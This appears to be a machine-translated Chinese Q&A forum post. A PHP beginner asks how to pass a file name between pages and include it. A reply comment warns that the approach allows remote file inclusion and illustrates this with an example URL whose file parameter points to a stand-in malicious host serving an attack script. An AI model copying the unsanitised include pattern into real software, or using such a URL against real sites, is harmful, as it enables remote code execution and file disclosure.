我確定我使用了錯誤的方式,但這是我第一次嘗試使用php。下一個代碼不起作用。變量$file
在本地定義,但我不知道如何使用全局變量。包含的可變參數
articles.php 在這個文件中我有一個列表:
<ol>
<li><a <?php $file="a.php"; ?> href="article.php" > title 1 </a> </li>
<li><a <?php $file="b.php"; ?> href="article.php" > title 2 </a> </li>
</ol>
article.php在這個文件我想用這個
<?php include("articles/$file"); ?>
如何正確界定$file
? 有沒有更好的方法來加載a.php
和b.php
?
對這類代碼要格外小心。現在,如果此代碼正常工作,它會將您的服務器打開爲TOTAL和TRIVIALLY EASY遠程妥協。例如'http://example.com?file = http:// malicioussite.com/attack_script.php'和poof ...你正在執行一個攻擊者選擇的腳本。 'articles /'部分是MINOR防禦,但仍然允許攻擊者加載並顯示系統上的任何文件,他們知道其完整路徑。 – 2013-02-28 21:51:59